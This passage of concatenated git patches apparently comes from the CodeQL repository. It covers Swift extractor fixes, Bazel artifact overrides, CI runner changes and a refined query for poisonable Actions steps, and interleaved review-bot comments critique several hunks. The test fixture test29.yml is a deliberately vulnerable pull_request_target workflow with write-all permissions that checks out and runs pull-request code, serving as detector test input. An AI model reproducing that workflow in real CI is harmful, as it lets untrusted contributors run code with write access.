$GITHUB_OUTPUT + + - run: | + cd build_dir + doc-builder push --commit_msg "Updated with commit ${{ steps.github-context.outputs.commit_sha }} From a2f162e4822182ab993a7017e1af624dc2aeb8a0 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 30 Oct 2024 12:43:44 +0100
Subject: [PATCH 0653/1267] Bump qlpack versions
---
 ql/lib/qlpack.yml | 2 +-
 ql/src/qlpack.yml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index a33cecb6fe0..f5f8abdce20 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.81
+version: 0.1.82
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 6d1bc8634ba..c0f849e1f3e 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.81
+version: 0.1.82
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From d325b8e678a5866335f9d124087210267fba792f Mon Sep 17 00:00:00 2001
From: Paolo Tranquilli
Date: Wed, 30 Oct 2024 15:56:48 +0100
Subject: [PATCH 0654/1267] Swift: update `load.bzl` and resources
---
 swift/third_party/load.bzl | 43 ++++++++++---------------
 swift/third_party/resources/BUILD.bazel | 27 ++++++++++++++++
 swift/third_party/resources/updating.md | 25 ++++++++++++++
 3 files changed, 69 insertions(+), 26 deletions(-)
 create mode 100644 swift/third_party/resources/updating.md
diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl
index 75eb585b6cc..0e47e6e78b6 100644
--- a/swift/third_party/load.bzl
+++ b/swift/third_party/load.bzl
@@ -3,14 +3,12 @@ load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive", "http_file" load("@bazel_tools//tools/build_defs/repo:utils.bzl", "maybe") load("//misc/bazel:lfs.bzl", "lfs_archive", "lfs_files") -# these are used to test new artifacts. They must not be merged to main as different from None -_override_resource_dir = { - "macOS": "ad533e614c3565db17186fa93684bd404d1bd66120b563957a44afc997a82b5e", - "Linux": "d6f1abbe9c0662ec2418b9a8c0136b1d8399601f556631a7b0910115cef3a38a", -} -_override_prebuilt = { - "macOS": "8f3c775aa7a62e97046f4dcfbc5b51c317712250396c7a07f7d0f4bd666a59d4", - "Linux": "5658fe92fe60b01b897757495d455c9fe435037a0973cb5b642e04be00a77ed3", +_override = { + # these are used to test new artifacts. Must be empty before merging to main + "swift-prebuilt-macOS.tar.zst": "a016ed60ee1a534439ed4d55100ecf6b9fc739f629be20942345ac5156cb6296", + "swift-prebuilt-Linux.tar.zst": "54240eb2da948207862ea8eb9bcbfe4447016534b9a8e6d8ee1af67db2a3e73f", + "resource-dir-macOS.zip": "fc7ed103d79f9dc61e716a58f221757c33ac2a4358de771d4889e1050f2a5b7a", + "resource-dir-Linux.zip": "e5323f44e72f446e26e7b1fc4920ca9b924e6b5ef8b22e9cb18a0f2f03732913", } _staging_url = "https://github.com/dsp-testing/codeql-swift-artifacts/releases/download/staging-{file}/{file}" @@ -18,12 +16,11 @@ _staging_url = "https://github.com/dsp-testing/codeql-swift-artifacts/releases/d def _load_resource_dir(plat): name = "swift-resource-dir-%s" % plat.lower() file = "resource-dir-%s.zip" % plat - override = _override_resource_dir[plat] - if override: + if file in _override: http_file( name = name, url = _staging_url.format(file = file), - sha256 = override, + sha256 = _override[file], downloaded_file_path = file, ) else: 
@@ -36,12 +33,11 @@ def _load_prebuilt(plat): name = "swift-prebuilt-%s" % plat.lower() file = "swift-prebuilt-%s.tar.zst" % plat build = _build % "swift-llvm-support" - override = _override_prebuilt[plat] - if override: + if file in _override: http_archive( name = name, url = _staging_url.format(file = file), - sha256 = override, + sha256 = _override[file], build_file = build, ) else: @@ -93,18 +89,13 @@ def load_dependencies(module_ctx): swift_deps = module_extension(load_dependencies) def test_no_override(): - test_body = ["#!/bin/bash", "", "RET=0"] - for name, definition in ( - ("_override_prebuilt", _override_prebuilt), - ("_override_resource_dir", _override_resource_dir), - ): - for plat in ("macOS", "Linux"): - if definition[plat]: - test_body += [ - 'echo %s[\\"%s\\"] overridden in swift/third/party/load.bzl' % (name, plat), - "RET=1", - ] - test_body += ["", "exit $RET"] + test_body = ["#!/bin/bash", ""] + test_body += [ + 'echo \\"%s\\" overridden in swift/third/party/load.bzl' % key + for key in _override + ] + if _override: + test_body.append("exit 1") write_file( name = "test-no-override-gen", out = "test-no-override.sh", diff --git a/swift/third_party/resources/BUILD.bazel b/swift/third_party/resources/BUILD.bazel index 3bf263911cd..8c26788e411 100644 --- a/swift/third_party/resources/BUILD.bazel +++ b/swift/third_party/resources/BUILD.bazel @@ -19,3 +19,30 @@ alias( }), visibility = ["//visibility:public"], ) + +[ + sh_binary( + name = "update-%s-%s" % (what, os), + srcs = ["update.sh"], + args = [ + "$(rlocationpath %s)" % what, + "$(rlocationpath %s)" % target, + ], + data = [ + what, + target, + ], + deps = ["//misc/bazel:sh_runfiles"], + ) + for os in _oses + for what, target in ( + ( + "prebuilt", + "swift-prebuilt-%s.tar.zst" % os, + ), + ( + "dir", + "resource-dir-%s.zip" % os, + ), + ) +] diff --git a/swift/third_party/resources/updating.md b/swift/third_party/resources/updating.md new file mode 100644 index 00000000000..9855eeecd9c 
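Review bot: The message built in `test_no_override` names `swift/third/party/load.bzl`, but the file patched by this commit is `swift/third_party/load.bzl`, so a failing override guard points the reader at a path that does not exist. This check is what keeps staging artifacts listed in `_override` from reaching `main`, so its output should be directly actionable: `'echo \\"%s\\" overridden in swift/third_party/load.bzl' % key`. The `write_file` call that consumes `test_body` continues past the end of the hunk.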
--- /dev/null +++ b/swift/third_party/resources/updating.md @@ -0,0 +1,25 @@ +These files can only be updated having access for the internal repository at the moment. + +In order to perform a Swift update: + +1. Dispatch the https://github.com/github/semmle-code/actions/workflows/__swift-prebuild.yml with the appropriate swift + tag. +2. Dispatch the https://github.com/github/semmle-code/actions/workflows/__swift-prepare-resource-dir.yml with the + appropriate swift tag. +3. Once the jobs finish, staged artifacts are available + at https://github.com/dsp-testing/codeql-swift-artifacts/releases. Copy and paste the sha256 within the `_override` + definition in [`load.bzl`](../load.bzl). +4. Compile and run test locally. Adjust the code if needed. New AST entities have to be dealt with in [ + `SwiftTagTraits.h`](../../extractor/infra/SwiftTagTraits.h). +5. Open a draft PR with the overridden artifacts. Make sure CI passes, go back to 4. otherwise. +6. Run DCA, got back to 4. in case of problems. +7. Once you are happy, do + ```bash + bazel run //swift/third_party/resources:update-dir-macos + bazel run //swift/third_party/resources:update-dir-linux + bazel run //swift/third_party/resources:update-prebuilt-macos + bazel run //swift/third_party/resources:update-prebuilt-linux + ``` + (or whatever you have overridden). This will pull the staged archives in the repository for git LFS. +8. Clear `_override` in [`load.bzl`](../load.bzl). +9. Push and your PR will be ready for `main`. From df8184e0dc4840cdac951df21f097dbcea0fce05 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 30 Oct 2024 15:59:03 +0100 Subject: [PATCH 0655/1267] Swift: fix `check-no-override` job --- .github/workflows/swift.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/swift.yml b/.github/workflows/swift.yml index 269bccdf28b..720c9eb4072 100644 --- a/.github/workflows/swift.yml +++ b/.github/workflows/swift.yml 
@@ -113,5 +113,6 @@ jobs: if : ${{ github.event_name == 'pull_request' }} runs-on: ubuntu-latest steps: + - uses: actions/checkout@v4 - shell: bash run: bazel test //swift/... --test_tag_filters=override --test_output=errors From 5e6228cf7c01b613eda4c48e8a4e1d8173979fa9 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 30 Oct 2024 16:11:08 +0100 Subject: [PATCH 0656/1267] Swift: fix --- .github/workflows/swift.yml | 2 +- swift/third_party/load.bzl | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/swift.yml b/.github/workflows/swift.yml index 720c9eb4072..6b9981a9b53 100644 --- a/.github/workflows/swift.yml +++ b/.github/workflows/swift.yml @@ -110,7 +110,7 @@ jobs: - uses: ./.github/actions/fetch-codeql - uses: ./swift/actions/database-upgrade-scripts check-no-override: - if : ${{ github.event_name == 'pull_request' }} + if : github.event_name == 'pull_request' runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index 0e47e6e78b6..0df011791a6 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl @@ -7,8 +7,8 @@ _override = { # these are used to test new artifacts. Must be empty before merging to main "swift-prebuilt-macOS.tar.zst": "a016ed60ee1a534439ed4d55100ecf6b9fc739f629be20942345ac5156cb6296", "swift-prebuilt-Linux.tar.zst": "54240eb2da948207862ea8eb9bcbfe4447016534b9a8e6d8ee1af67db2a3e73f", - "resource-dir-macOS.zip": "fc7ed103d79f9dc61e716a58f221757c33ac2a4358de771d4889e1050f2a5b7a", - "resource-dir-Linux.zip": "e5323f44e72f446e26e7b1fc4920ca9b924e6b5ef8b22e9cb18a0f2f03732913", + "resource-dir-macOS.zip": "286e4403aa0a56641c2789e82036481535e336484f2c760bec0f42e3afe5dd87", + "resource-dir-Linux.zip": "16a1760f152395377a580a994885e0877338279125834463a6a38f4006ad61ca", } _staging_url = "https://github.com/dsp-testing/codeql-swift-artifacts/releases/download/staging-{file}/{file}" 
From 01417025f276b5e4d107bd3b616fb2bbeb19cd8a Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 30 Oct 2024 16:20:27 +0100 Subject: [PATCH 0657/1267] Swift: use `ubuntu-latest` --- .github/workflows/swift.yml | 4 ++-- swift/README.md | 5 +++++ 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/.github/workflows/swift.yml b/.github/workflows/swift.yml index 6b9981a9b53..0d2a9518677 100644 --- a/.github/workflows/swift.yml +++ b/.github/workflows/swift.yml @@ -50,14 +50,14 @@ jobs: - uses: ./swift/actions/build-and-test build-and-test-linux: if: github.repository_owner == 'github' - runs-on: ubuntu-latest-xl + runs-on: ubuntu-24.04 steps: - uses: actions/checkout@v4 - uses: ./swift/actions/build-and-test qltests-linux: if: github.repository_owner == 'github' needs: build-and-test-linux - runs-on: ubuntu-latest-xl + runs-on: ubuntu-24.04 steps: - uses: actions/checkout@v4 - uses: ./swift/actions/run-ql-tests diff --git a/swift/README.md b/swift/README.md index a39c0ea5578..df2c8cae137 100644 --- a/swift/README.md +++ b/swift/README.md @@ -113,3 +113,8 @@ In particular for breakpoints to work you might need to setup the following remo ### Thread safety The extractor is single-threaded, and there was no effort to make anything in it thread-safe. + +### Updating the swift compiler version + +This can only be done with access to the internal repository at the moment. Some (incomplete) instructions are +found [here](third_party/resources/updating.md). From 3877eb8bc9592b866a3f1a94ba143b9024a91225 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 30 Oct 2024 17:08:20 +0100 Subject: [PATCH 0658/1267] Swift: tentatively fix type mangling --- swift/extractor/mangler/SwiftMangler.cpp | 36 ++++++++++++++++-------- swift/third_party/load.bzl | 2 +- 2 files changed, 26 insertions(+), 12 deletions(-) diff --git a/swift/extractor/mangler/SwiftMangler.cpp b/swift/extractor/mangler/SwiftMangler.cpp index bb8f63c232e..3743ab53dca 100644 
--- a/swift/extractor/mangler/SwiftMangler.cpp +++ b/swift/extractor/mangler/SwiftMangler.cpp @@ -197,19 +197,30 @@ SwiftMangledName SwiftMangler::visitAnyFunctionType(const swift::AnyFunctionType auto ret = initMangled(type); for (const auto& param : type->getParams()) { ret << fetch(param.getPlainType()); - if (param.isInOut()) { - ret << "_inout"; - } - if (param.isOwned()) { - ret << "_owned"; - } - if (param.isShared()) { - ret << "_shared"; - } - if (param.isIsolated()) { + auto flags = param.getParameterFlags(); + ret << "_" << getNameForParamSpecifier(flags.getOwnershipSpecifier()); + if (flags.isIsolated()) { ret << "_isolated"; } - if (param.isVariadic()) { + if (flags.isAutoClosure()) { + ret << "_autoclosure"; + } + if (flags.isNonEphemeral()) { + ret << "_nonephermeral"; + } + if (flags.isIsolated()) { + ret << "_isolated"; + } + if (flags.isSending()) { + ret << "_sending"; + } + if (flags.isCompileTimeConst()) { + ret << "_compiletimeconst"; + } + if (flags.isNoDerivative()) { + ret << "_noderivative"; + } + if (flags.isVariadic()) { ret << "..."; } } @@ -219,6 +230,9 @@ SwiftMangledName SwiftMangler::visitAnyFunctionType(const swift::AnyFunctionType } if (type->isThrowing()) { ret << "_throws"; + if (type->hasThrownError()) { + ret << "(" << fetch(type->getThrownError()) << ")"; + } } if (type->isSendable()) { ret << "_sendable"; diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index 0df011791a6..312e7e84221 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl 
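Review bot: In the parameter loop of `visitAnyFunctionType`, `flags.isIsolated()` is tested twice, so an isolated parameter gets `_isolated` appended twice, and the non-ephemeral marker is spelled `_nonephermeral`. As far as the hunk shows neither affects uniqueness, but these strings become part of the mangled name, so they are cheaper to correct now. Drop the second `if (flags.isIsolated()) { ret << "_isolated"; }` block and write `ret << "_nonephemeral";`. The ownership specifier is now emitted for every parameter through `getNameForParamSpecifier`; a one-line comment saying that is intentional would help. The function starts and ends outside the hunk.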
@@ -6,7 +6,7 @@ load("//misc/bazel:lfs.bzl", "lfs_archive", "lfs_files") _override = { # these are used to test new artifacts. Must be empty before merging to main "swift-prebuilt-macOS.tar.zst": "a016ed60ee1a534439ed4d55100ecf6b9fc739f629be20942345ac5156cb6296", - "swift-prebuilt-Linux.tar.zst": "54240eb2da948207862ea8eb9bcbfe4447016534b9a8e6d8ee1af67db2a3e73f", + "swift-prebuilt-Linux.tar.zst": "c45976d50670964132cef1dcf98bccd3fff809d33b2207a85cf3cfd07ec84528", "resource-dir-macOS.zip": "286e4403aa0a56641c2789e82036481535e336484f2c760bec0f42e3afe5dd87", "resource-dir-Linux.zip": "16a1760f152395377a580a994885e0877338279125834463a6a38f4006ad61ca", } From 66e43c40066f23bb1313a30477ce7c9f8b681ab4 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 30 Oct 2024 17:16:35 +0100 Subject: [PATCH 0659/1267] Swift: use ubuntu 22.04 --- .github/workflows/swift.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/swift.yml b/.github/workflows/swift.yml index 0d2a9518677..15cb5413536 100644 --- a/.github/workflows/swift.yml +++ b/.github/workflows/swift.yml @@ -50,14 +50,14 @@ jobs: - uses: ./swift/actions/build-and-test build-and-test-linux: if: github.repository_owner == 'github' - runs-on: ubuntu-24.04 + runs-on: ubuntu-22.04 steps: - uses: actions/checkout@v4 - uses: ./swift/actions/build-and-test qltests-linux: if: github.repository_owner == 'github' needs: build-and-test-linux - runs-on: ubuntu-24.04 + runs-on: ubuntu-22.04 steps: - uses: actions/checkout@v4 - uses: ./swift/actions/run-ql-tests From 0157bf3297d1d2173efe9036ba6606273813d6e8 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 30 Oct 2024 22:12:17 +0100 Subject: [PATCH 0660/1267] fix: improve JS require/import poisonable step to account for cwd --- .../actions/security/PoisonableSteps.qll | 5 +++-- .../CWE-829/.github/workflows/test29.yml | 21 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 2 ++ 3 files changed, 26 insertions(+), 2 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index d446c446641..1f3bc66bd77 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -21,9 +21,10 @@ class JavascriptImportUsesStep extends PoisonableStep, UsesStep { this.getCallee() = "actions/github-script" and script = this.getArgument("script") and line = script.splitAt("\n").trim() and + // const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs') // const script = require('${{ github.workspace }}/scripts/test.js'); - // await script({ github, context, core }); - line.regexpMatch(".*(import|require)\\b.*github.workspace\\b.*") + // const script = require('./scripts'); + line.regexpMatch(".*(import|require)\\(('|\")(\\./|.*github.workspace).*") ) } } diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml new file mode 100644 index 00000000000..cc7f71a7b3e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml 
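Review bot: The new pattern in `JavascriptImportUsesStep` matches only when `(` is followed directly by `'` or `"`, so `require( './x')`, `../`-relative paths and a backtick template literal containing `github.workspace` (which the old pattern accepted) are not flagged. That leaves false negatives for scripts that load code from a checked-out pull request. The `\\b` before `import|require` was also dropped, and the `.` in `github.workspace` is still unescaped. A tighter form would be ``line.regexpMatch(".*\\b(import|require)\\(\\s*('|\"|`)(\\.{1,2}/|.*github\\.workspace).*")``. The fixture added in this commit covers only the `./` case, so a test per additional form would pin the behaviour.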
@@ -0,0 +1,21 @@ +on: pull_request_target + +jobs: + test: + permissions: write-all + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + fetch-depth: 0 + + - uses: actions/github-script@v5 + with: + github-token: ${{secrets.GITHUB_TOKEN}} + script: | + const { + foo + } = require('./foo'); + diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 35d61dac5fa..85c2529c54c 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -285,6 +285,7 @@ edges | .github/workflows/test25.yml:32:9:35:6 | Run Step | .github/workflows/test25.yml:35:9:42:53 | Run Step | | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | | .github/workflows/test28.yml:17:9:20:6 | Uses Step | .github/workflows/test28.yml:20:9:20:22 | Run Step | +| .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | 
@@ -346,6 +347,7 @@ edges | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | | .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | | .github/workflows/test27.yml:21:9:22:16 | Run Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test29.yml:14:7:21:11 | Uses Step | .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test29.yml:1:5:1:23 | pull_request_target | pull_request_target | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | | 
.github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | From 7f3745cfcdefa1bc739e80d09e858ba4f266e86e Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 31 Oct 2024 06:22:06 +0100 Subject: [PATCH 0661/1267] Swift: fix `@isolated(any)` DB inconsistencies --- swift/extractor/mangler/SwiftMangler.cpp | 3 +++ swift/third_party/load.bzl | 2 +- 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/swift/extractor/mangler/SwiftMangler.cpp b/swift/extractor/mangler/SwiftMangler.cpp index 3743ab53dca..04e04fd6fbc 100644 --- a/swift/extractor/mangler/SwiftMangler.cpp +++ b/swift/extractor/mangler/SwiftMangler.cpp @@ -243,6 +243,9 @@ SwiftMangledName SwiftMangler::visitAnyFunctionType(const swift::AnyFunctionType if (type->hasGlobalActor()) { ret << "_actor" << fetch(type->getGlobalActor()); } + if (type->getIsolation().isErased()) { + ret << "_isolated"; + } // TODO: see if this needs to be used in identifying types, if not it needs to be removed from // type printing in the Swift compiler code assert(type->hasExtInfo() && "type must have ext info"); diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index 312e7e84221..dd8470a023f 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl 
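Review bot: The added branch appends `_isolated` for a type whose isolation is erased, which is the same token the parameter loop of this function (changed in PATCH 0658) emits for an isolated parameter. The two cases therefore cannot be told apart when reading a mangled name. A distinct suffix such as `ret << "_isolated_any";` would keep the name self-describing. Whether a real collision is possible depends on what is written between the two sites, which the hunk does not show. The function starts and ends outside the hunk.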
@@ -5,7 +5,7 @@ load("//misc/bazel:lfs.bzl", "lfs_archive", "lfs_files") _override = { # these are used to test new artifacts. Must be empty before merging to main - "swift-prebuilt-macOS.tar.zst": "a016ed60ee1a534439ed4d55100ecf6b9fc739f629be20942345ac5156cb6296", + "swift-prebuilt-macOS.tar.zst": "4679ad4086ac6894e2f8a6bd71c5033941c894844809bf988dacb8af0c384416", "swift-prebuilt-Linux.tar.zst": "c45976d50670964132cef1dcf98bccd3fff809d33b2207a85cf3cfd07ec84528", "resource-dir-macOS.zip": "286e4403aa0a56641c2789e82036481535e336484f2c760bec0f42e3afe5dd87", "resource-dir-Linux.zip": "16a1760f152395377a580a994885e0877338279125834463a6a38f4006ad61ca", From 34b8b43843fb58480fa58834abe2e94649467d9d Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 31 Oct 2024 06:41:46 +0100 Subject: [PATCH 0662/1267] Swift: use `-typecheck` in QL tests --- swift/tools/qltest.sh | 2 +- swift/tools/test/qltest/utils.py | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/swift/tools/qltest.sh b/swift/tools/qltest.sh index ba5fb779d28..00657d593b8 100755 --- a/swift/tools/qltest.sh +++ b/swift/tools/qltest.sh @@ -9,7 +9,7 @@ RESOURCE_DIR="$CODEQL_EXTRACTOR_SWIFT_ROOT/resource-dir/$CODEQL_PLATFORM" export CODEQL_EXTRACTOR_SWIFT_LOG_LEVELS=${CODEQL_EXTRACTOR_SWIFT_LOG_LEVELS:-out:text:no_logs,out:console:info} for src in *.swift; do env=() - opts=(-resource-dir "$RESOURCE_DIR" -c -primary-file "$src") + opts=(-resource-dir "$RESOURCE_DIR" -typecheck -primary-file "$src") opts+=($(sed -n '1 s=//codeql-extractor-options:==p' $src)) expected_status=$(sed -n 's=//codeql-extractor-expected-status:[[:space:]]*==p' $src) expected_status=${expected_status:-0} diff --git a/swift/tools/test/qltest/utils.py b/swift/tools/test/qltest/utils.py index fc2d6582a82..9ed49c04153 100644 --- a/swift/tools/test/qltest/utils.py +++ b/swift/tools/test/qltest/utils.py 
@@ -60,7 +60,7 @@ def assert_extractor_executed_with(*flags): for actual, expected in itertools.zip_longest(execution, flags): if actual: actual = actual.strip() - expected_prefix = f"-resource-dir {swift_root}/resource-dir/{platform} -c -primary-file " + expected_prefix = f"-resource-dir {swift_root}/resource-dir/{platform} -typecheck -primary-file " assert actual.startswith(expected_prefix), f"correct options not found in\n{actual}" actual = actual[len(expected_prefix):] assert actual, f"\nnot encountered: {expected}" From 3aa71230325f48e04ada0fb5a178c159832dbaa7 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 31 Oct 2024 09:26:03 +0100 Subject: [PATCH 0663/1267] Swift: restrict `UnresolvedAstNodes` to known locations --- swift/ql/consistency-queries/UnresolvedAstNodes.ql | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/swift/ql/consistency-queries/UnresolvedAstNodes.ql b/swift/ql/consistency-queries/UnresolvedAstNodes.ql index d2369ab9436..b77e526c573 100644 --- a/swift/ql/consistency-queries/UnresolvedAstNodes.ql +++ b/swift/ql/consistency-queries/UnresolvedAstNodes.ql @@ -1,5 +1,8 @@ import swift -from AstNode n -where n.getAPrimaryQlClass().matches("Unresolved%") -select n +from AstNode n, string cls +where + cls = n.getAPrimaryQlClass() and + cls.matches("Unresolved%") and + not n.getLocation() instanceof UnknownLocation +select n, cls From ce4273d461d852032e29a528564e56f819a11840 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 31 Oct 2024 09:52:08 +0100 Subject: [PATCH 0664/1267] Revert "Swift: use `-typecheck` in QL tests" This reverts commit 34b8b43843fb58480fa58834abe2e94649467d9d. --- swift/tools/qltest.sh | 2 +- swift/tools/test/qltest/utils.py | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/swift/tools/qltest.sh b/swift/tools/qltest.sh index 00657d593b8..ba5fb779d28 100755 --- a/swift/tools/qltest.sh +++ b/swift/tools/qltest.sh 
@@ -9,7 +9,7 @@ RESOURCE_DIR="$CODEQL_EXTRACTOR_SWIFT_ROOT/resource-dir/$CODEQL_PLATFORM" export CODEQL_EXTRACTOR_SWIFT_LOG_LEVELS=${CODEQL_EXTRACTOR_SWIFT_LOG_LEVELS:-out:text:no_logs,out:console:info} for src in *.swift; do env=() - opts=(-resource-dir "$RESOURCE_DIR" -typecheck -primary-file "$src") + opts=(-resource-dir "$RESOURCE_DIR" -c -primary-file "$src") opts+=($(sed -n '1 s=//codeql-extractor-options:==p' $src)) expected_status=$(sed -n 's=//codeql-extractor-expected-status:[[:space:]]*==p' $src) expected_status=${expected_status:-0} diff --git a/swift/tools/test/qltest/utils.py b/swift/tools/test/qltest/utils.py index 9ed49c04153..fc2d6582a82 100644 --- a/swift/tools/test/qltest/utils.py +++ b/swift/tools/test/qltest/utils.py @@ -60,7 +60,7 @@ def assert_extractor_executed_with(*flags): for actual, expected in itertools.zip_longest(execution, flags): if actual: actual = actual.strip() - expected_prefix = f"-resource-dir {swift_root}/resource-dir/{platform} -typecheck -primary-file " + expected_prefix = f"-resource-dir {swift_root}/resource-dir/{platform} -c -primary-file " assert actual.startswith(expected_prefix), f"correct options not found in\n{actual}" actual = actual[len(expected_prefix):] assert actual, f"\nnot encountered: {expected}" From 5a045beff9134231cc661c831809b0fe137e50bf Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 31 Oct 2024 10:03:08 +0100 Subject: [PATCH 0665/1267] Swift: turn off SIL verifications --- swift/extractor/main.cpp | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/swift/extractor/main.cpp b/swift/extractor/main.cpp index 045d7fdb968..0883b0717fc 100644 --- a/swift/extractor/main.cpp +++ b/swift/extractor/main.cpp 
@@ -76,6 +76,13 @@ static void processFrontendOptions(codeql::SwiftExtractorState& state, } } +static void turnOffSilVerifications(swift::SILOptions& options) { + options.VerifyAll = false; + options.VerifyExclusivity = false; + options.VerifyNone = true; + options.VerifySILOwnership = false; +} + codeql::TrapDomain invocationTrapDomain(codeql::SwiftExtractorState& state); // This is part of the swiftFrontendTool interface, we hook into the @@ -90,6 +97,7 @@ class Observer : public swift::FrontendObserver { options.KeepASTContext = true; lockOutputSwiftModuleTraps(state, options); processFrontendOptions(state, options); + turnOffSilVerifications(invocation.getSILOptions()); } void configuredCompiler(swift::CompilerInstance& instance) override { From ebd45ace50d3daef7b0457dfdfe868b2d5d64d60 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 10:59:05 +0100 Subject: [PATCH 0666/1267] feat: add source model for peter-murra/issue-forms-body-parser --- ...r-murray_issue-forms-body-parser.model.yml | 6 ++++++ .../CWE-094/.github/workflows/test24.yml | 19 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 4 ++++ .../CWE-094/CodeInjectionMedium.expected | 3 +++ 4 files changed, 32 insertions(+) create mode 100644 